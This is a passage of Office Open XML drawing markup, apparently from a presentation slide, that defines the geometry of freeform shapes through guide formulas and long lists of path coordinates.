                  <a:gd name="T23" fmla="*/ 195 h 668"/>
                  <a:gd name="T24" fmla="*/ 315 w 752"/>
                  <a:gd name="T25" fmla="*/ 126 h 668"/>
                  <a:gd name="T26" fmla="*/ 362 w 752"/>
                  <a:gd name="T27" fmla="*/ 69 h 668"/>
                  <a:gd name="T28" fmla="*/ 441 w 752"/>
                  <a:gd name="T29" fmla="*/ 21 h 668"/>
                  <a:gd name="T30" fmla="*/ 567 w 752"/>
                  <a:gd name="T31" fmla="*/ 5 h 668"/>
                  <a:gd name="T32" fmla="*/ 641 w 752"/>
                  <a:gd name="T33" fmla="*/ 48 h 668"/>
                  <a:gd name="T34" fmla="*/ 704 w 752"/>
                  <a:gd name="T35" fmla="*/ 121 h 668"/>
                  <a:gd name="T36" fmla="*/ 745 w 752"/>
                  <a:gd name="T37" fmla="*/ 205 h 668"/>
                  <a:gd name="T38" fmla="*/ 751 w 752"/>
                  <a:gd name="T39" fmla="*/ 284 h 668"/>
                  <a:gd name="T40" fmla="*/ 725 w 752"/>
                  <a:gd name="T41" fmla="*/ 357 h 668"/>
                  <a:gd name="T42" fmla="*/ 641 w 752"/>
                  <a:gd name="T43" fmla="*/ 431 h 668"/>
                  <a:gd name="T44" fmla="*/ 598 w 752"/>
                  <a:gd name="T45" fmla="*/ 284 h 668"/>
                  <a:gd name="T46" fmla="*/ 625 w 752"/>
                  <a:gd name="T47" fmla="*/ 252 h 668"/>
                  <a:gd name="T48" fmla="*/ 625 w 752"/>
                  <a:gd name="T49" fmla="*/ 199 h 668"/>
                  <a:gd name="T50" fmla="*/ 598 w 752"/>
                  <a:gd name="T51" fmla="*/ 163 h 668"/>
                  <a:gd name="T52" fmla="*/ 572 w 752"/>
                  <a:gd name="T53" fmla="*/ 142 h 668"/>
                  <a:gd name="T54" fmla="*/ 541 w 752"/>
                  <a:gd name="T55" fmla="*/ 142 h 668"/>
                  <a:gd name="T56" fmla="*/ 494 w 752"/>
                  <a:gd name="T57" fmla="*/ 158 h 668"/>
                  <a:gd name="T58" fmla="*/ 451 w 752"/>
                  <a:gd name="T59" fmla="*/ 199 h 668"/>
                  <a:gd name="T60" fmla="*/ 446 w 752"/>
                  <a:gd name="T61" fmla="*/ 231 h 668"/>
                  <a:gd name="T62" fmla="*/ 473 w 752"/>
                  <a:gd name="T63" fmla="*/ 399 h 668"/>
                  <a:gd name="T64" fmla="*/ 473 w 752"/>
                  <a:gd name="T65" fmla="*/ 483 h 668"/>
                  <a:gd name="T66" fmla="*/ 462 w 752"/>
                  <a:gd name="T67" fmla="*/ 541 h 668"/>
                  <a:gd name="T68" fmla="*/ 431 w 752"/>
                  <a:gd name="T69" fmla="*/ 588 h 668"/>
                  <a:gd name="T70" fmla="*/ 378 w 752"/>
                  <a:gd name="T71" fmla="*/ 625 h 668"/>
                  <a:gd name="T72" fmla="*/ 241 w 752"/>
                  <a:gd name="T73" fmla="*/ 667 h 668"/>
                  <a:gd name="T74" fmla="*/ 157 w 752"/>
                  <a:gd name="T75" fmla="*/ 640 h 668"/>
                  <a:gd name="T76" fmla="*/ 53 w 752"/>
                  <a:gd name="T77" fmla="*/ 530 h 668"/>
                  <a:gd name="T78" fmla="*/ 5 w 752"/>
                  <a:gd name="T79" fmla="*/ 431 h 668"/>
                  <a:gd name="T80" fmla="*/ 0 w 752"/>
                  <a:gd name="T81" fmla="*/ 346 h 668"/>
                  <a:gd name="T82" fmla="*/ 68 w 752"/>
                  <a:gd name="T83" fmla="*/ 242 h 668"/>
                  <a:gd name="T84" fmla="*/ 210 w 752"/>
                  <a:gd name="T85" fmla="*/ 326 h 6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752" h="668">
                    <a:moveTo>
                      <a:pt x="194" y="336"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="194" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="604" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="641" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="672" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="751" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="751" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="751" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="698" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="656" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="641" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="561" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="561" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="610"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="667"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="667"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="336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5" name="Freeform 46"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7196138" y="2498725"/>
                <a:ext cx="209550" cy="182563"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 200 w 584"/>
                  <a:gd name="T1" fmla="*/ 221 h 505"/>
                  <a:gd name="T2" fmla="*/ 158 w 584"/>
                  <a:gd name="T3" fmla="*/ 247 h 505"/>
                  <a:gd name="T4" fmla="*/ 126 w 584"/>
                  <a:gd name="T5" fmla="*/ 278 h 505"/>
                  <a:gd name="T6" fmla="*/ 110 w 584"/>
                  <a:gd name="T7" fmla="*/ 310 h 505"/>
                  <a:gd name="T8" fmla="*/ 110 w 584"/>
                  <a:gd name="T9" fmla="*/ 325 h 505"/>
                  <a:gd name="T10" fmla="*/ 116 w 584"/>
                  <a:gd name="T11" fmla="*/ 347 h 505"/>
                  <a:gd name="T12" fmla="*/ 136 w 584"/>
                  <a:gd name="T13" fmla="*/ 368 h 505"/>
                  <a:gd name="T14" fmla="*/ 168 w 584"/>
                  <a:gd name="T15" fmla="*/ 378 h 505"/>
                  <a:gd name="T16" fmla="*/ 200 w 584"/>
                  <a:gd name="T17" fmla="*/ 378 h 505"/>
                  <a:gd name="T18" fmla="*/ 310 w 584"/>
                  <a:gd name="T19" fmla="*/ 478 h 505"/>
                  <a:gd name="T20" fmla="*/ 263 w 584"/>
                  <a:gd name="T21" fmla="*/ 494 h 505"/>
                  <a:gd name="T22" fmla="*/ 189 w 584"/>
                  <a:gd name="T23" fmla="*/ 504 h 505"/>
                  <a:gd name="T24" fmla="*/ 153 w 584"/>
                  <a:gd name="T25" fmla="*/ 498 h 505"/>
                  <a:gd name="T26" fmla="*/ 89 w 584"/>
                  <a:gd name="T27" fmla="*/ 462 h 505"/>
                  <a:gd name="T28" fmla="*/ 37 w 584"/>
                  <a:gd name="T29" fmla="*/ 394 h 505"/>
                  <a:gd name="T30" fmla="*/ 21 w 584"/>
                  <a:gd name="T31" fmla="*/ 357 h 505"/>
                  <a:gd name="T32" fmla="*/ 0 w 584"/>
                  <a:gd name="T33" fmla="*/ 299 h 505"/>
                  <a:gd name="T34" fmla="*/ 0 w 584"/>
                  <a:gd name="T35" fmla="*/ 273 h 505"/>
                  <a:gd name="T36" fmla="*/ 11 w 584"/>
                  <a:gd name="T37" fmla="*/ 226 h 505"/>
                  <a:gd name="T38" fmla="*/ 32 w 584"/>
                  <a:gd name="T39" fmla="*/ 184 h 505"/>
                  <a:gd name="T40" fmla="*/ 63 w 584"/>
                  <a:gd name="T41" fmla="*/ 147 h 505"/>
                  <a:gd name="T42" fmla="*/ 106 w 584"/>
                  <a:gd name="T43" fmla="*/ 116 h 505"/>
                  <a:gd name="T44" fmla="*/ 195 w 584"/>
                  <a:gd name="T45" fmla="*/ 63 h 505"/>
                  <a:gd name="T46" fmla="*/ 294 w 584"/>
                  <a:gd name="T47" fmla="*/ 16 h 505"/>
                  <a:gd name="T48" fmla="*/ 342 w 584"/>
                  <a:gd name="T49" fmla="*/ 5 h 505"/>
                  <a:gd name="T50" fmla="*/ 389 w 584"/>
                  <a:gd name="T51" fmla="*/ 0 h 505"/>
                  <a:gd name="T52" fmla="*/ 436 w 584"/>
                  <a:gd name="T53" fmla="*/ 10 h 505"/>
                  <a:gd name="T54" fmla="*/ 478 w 584"/>
                  <a:gd name="T55" fmla="*/ 31 h 505"/>
                  <a:gd name="T56" fmla="*/ 499 w 584"/>
                  <a:gd name="T57" fmla="*/ 47 h 505"/>
                  <a:gd name="T58" fmla="*/ 536 w 584"/>
                  <a:gd name="T59" fmla="*/ 89 h 505"/>
                  <a:gd name="T60" fmla="*/ 557 w 584"/>
                  <a:gd name="T61" fmla="*/ 121 h 505"/>
                  <a:gd name="T62" fmla="*/ 583 w 584"/>
                  <a:gd name="T63" fmla="*/ 200 h 505"/>
                  <a:gd name="T64" fmla="*/ 583 w 584"/>
                  <a:gd name="T65" fmla="*/ 221 h 505"/>
                  <a:gd name="T66" fmla="*/ 562 w 584"/>
                  <a:gd name="T67" fmla="*/ 304 h 505"/>
                  <a:gd name="T68" fmla="*/ 536 w 584"/>
                  <a:gd name="T69" fmla="*/ 341 h 505"/>
                  <a:gd name="T70" fmla="*/ 499 w 584"/>
                  <a:gd name="T71" fmla="*/ 373 h 505"/>
                  <a:gd name="T72" fmla="*/ 400 w 584"/>
                  <a:gd name="T73" fmla="*/ 436 h 505"/>
                  <a:gd name="T74" fmla="*/ 236 w 584"/>
                  <a:gd name="T75" fmla="*/ 200 h 505"/>
                  <a:gd name="T76" fmla="*/ 431 w 584"/>
                  <a:gd name="T77" fmla="*/ 257 h 505"/>
                  <a:gd name="T78" fmla="*/ 447 w 584"/>
                  <a:gd name="T79" fmla="*/ 247 h 505"/>
                  <a:gd name="T80" fmla="*/ 462 w 584"/>
                  <a:gd name="T81" fmla="*/ 231 h 505"/>
                  <a:gd name="T82" fmla="*/ 473 w 584"/>
                  <a:gd name="T83" fmla="*/ 200 h 505"/>
                  <a:gd name="T84" fmla="*/ 473 w 584"/>
                  <a:gd name="T85" fmla="*/ 178 h 505"/>
                  <a:gd name="T86" fmla="*/ 467 w 584"/>
                  <a:gd name="T87" fmla="*/ 163 h 505"/>
                  <a:gd name="T88" fmla="*/ 441 w 584"/>
                  <a:gd name="T89" fmla="*/ 137 h 505"/>
                  <a:gd name="T90" fmla="*/ 426 w 584"/>
                  <a:gd name="T91" fmla="*/ 131 h 505"/>
                  <a:gd name="T92" fmla="*/ 404 w 584"/>
                  <a:gd name="T93" fmla="*/ 126 h 505"/>
                  <a:gd name="T94" fmla="*/ 368 w 584"/>
                  <a:gd name="T95" fmla="*/ 137 h 505"/>
                  <a:gd name="T96" fmla="*/ 315 w 584"/>
                  <a:gd name="T97" fmla="*/ 157 h 505"/>
                  <a:gd name="T98" fmla="*/ 383 w 584"/>
                  <a:gd name="T99" fmla="*/ 289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84" h="505">
                    <a:moveTo>
                      <a:pt x="200" y="221"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="200" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="221"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="431" y="257"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="431" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="257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6" name="Freeform 47"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7273925" y="2662238"/>
                <a:ext cx="212725" cy="177800"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 430 w 589"/>
                  <a:gd name="T1" fmla="*/ 258 h 495"/>
                  <a:gd name="T2" fmla="*/ 461 w 589"/>
                  <a:gd name="T3" fmla="*/ 237 h 495"/>
                  <a:gd name="T4" fmla="*/ 477 w 589"/>
                  <a:gd name="T5" fmla="*/ 205 h 495"/>
                  <a:gd name="T6" fmla="*/ 477 w 589"/>
                  <a:gd name="T7" fmla="*/ 190 h 495"/>
                  <a:gd name="T8" fmla="*/ 472 w 589"/>
                  <a:gd name="T9" fmla="*/ 174 h 495"/>
                  <a:gd name="T10" fmla="*/ 441 w 589"/>
                  <a:gd name="T11" fmla="*/ 137 h 495"/>
                  <a:gd name="T12" fmla="*/ 425 w 589"/>
                  <a:gd name="T13" fmla="*/ 132 h 495"/>
                  <a:gd name="T14" fmla="*/ 398 w 589"/>
                  <a:gd name="T15" fmla="*/ 132 h 495"/>
                  <a:gd name="T16" fmla="*/ 341 w 589"/>
                  <a:gd name="T17" fmla="*/ 147 h 495"/>
                  <a:gd name="T18" fmla="*/ 262 w 589"/>
                  <a:gd name="T19" fmla="*/ 179 h 495"/>
                  <a:gd name="T20" fmla="*/ 184 w 589"/>
                  <a:gd name="T21" fmla="*/ 216 h 495"/>
